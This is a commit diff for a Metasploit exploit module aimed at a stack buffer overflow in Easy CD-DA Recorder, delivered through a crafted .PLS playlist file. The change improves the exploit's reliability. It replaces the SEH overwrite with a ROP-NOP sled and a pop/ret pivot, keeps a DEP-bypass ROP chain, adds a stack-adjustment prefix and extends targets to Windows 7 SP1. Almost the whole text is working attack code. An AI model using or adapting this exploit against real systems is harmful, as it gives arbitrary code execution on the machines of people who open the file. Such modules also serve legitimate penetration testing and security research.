Fix and improve reliability
parent
e8a3984c85
commit
3717374896
|
@ -9,18 +9,17 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = NormalRanking
|
||||
|
||||
include Msf::Exploit::FILEFORMAT
|
||||
include Msf::Exploit::Seh
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'Easy CD-DA Recorder 2007 PLS Buffer Overflow',
|
||||
'Name' => 'Easy CD-DA Recorder PLS Buffer Overflow',
|
||||
'Description' => %q{
|
||||
This module exploits a stack-based buffer overflow vulnerability in
|
||||
Easy CD-DA Recorder 2007, caused by a long string in a playlist entry.
|
||||
|
||||
By persuading the victim to open a specially-crafted .PLS file, a
|
||||
remote attacker could execute arbitrary code on the system or cause
|
||||
the application to crash.
|
||||
the application to crash. This modules has been tested successfully on
|
||||
Windows XP SP3 and Windows 7 SP1.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Author' =>
|
||||
|
@ -43,17 +42,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Platform' => 'win',
|
||||
'Payload' =>
|
||||
{
|
||||
'BadChars' => "\x0a\x3d",
|
||||
'Space' => 2559
|
||||
'DisableNops' => true,
|
||||
'BadChars' => "\x0a\x3d",
|
||||
'Space' => 2472,
|
||||
'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
|
||||
},
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Windows XP SP3 (DEP Bypass)',
|
||||
[ 'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)',
|
||||
# easycdda.exe 3.0.114.0
|
||||
# audconv.dll 7.0.815.0
|
||||
{
|
||||
'Offset' => 1108,
|
||||
'Ret' => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll]
|
||||
}
|
||||
],
|
||||
]
|
||||
],
|
||||
'Privileged' => false,
|
||||
'DisclosureDate' => 'Jun 7 2010',
|
||||
|
@ -71,12 +74,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return make_nops(4).unpack("V").first
|
||||
end
|
||||
|
||||
def exploit
|
||||
def rop_nops(n = 1)
|
||||
# RETN (ROP NOP) [audconv.dll]
|
||||
[0x1003d55d].pack('V') * n
|
||||
end
|
||||
|
||||
rop_nop =
|
||||
[
|
||||
0x1003d55d # RETN (ROP NOP) [audconv.dll]
|
||||
].flatten.pack('V*')
|
||||
def exploit
|
||||
|
||||
# ROP chain generated by mona.py - See corelan.be
|
||||
rop_gadgets =
|
||||
|
@ -100,15 +103,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
0x00429692 # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe]
|
||||
].flatten.pack('V*')
|
||||
|
||||
sploit = rand_text_alpha_upper(target['Offset'])
|
||||
sploit << generate_seh_record(target.ret)
|
||||
sploit << rand_text_alpha_upper(80)
|
||||
sploit << rop_nop
|
||||
sploit << rand_text_alpha_upper(4)
|
||||
sploit = rop_nops(target['Offset'] / 4)
|
||||
sploit << [0x1003d55c].pack("V") # pop edi # ret [audconv.dll]
|
||||
sploit << [target.ret].pack("V")
|
||||
sploit << rop_nops(22)
|
||||
sploit << rop_gadgets
|
||||
sploit << make_nops(4)
|
||||
sploit << payload.encoded
|
||||
sploit << rand_text_alpha_upper(10000)
|
||||
sploit << rand_text_alpha_upper(10000) # make it crash
|
||||
|
||||
# Create the file
|
||||
print_status("Creating '#{datastore['FILENAME']}' file ...")
|
||||
|
|
Loading…
Reference in New Issue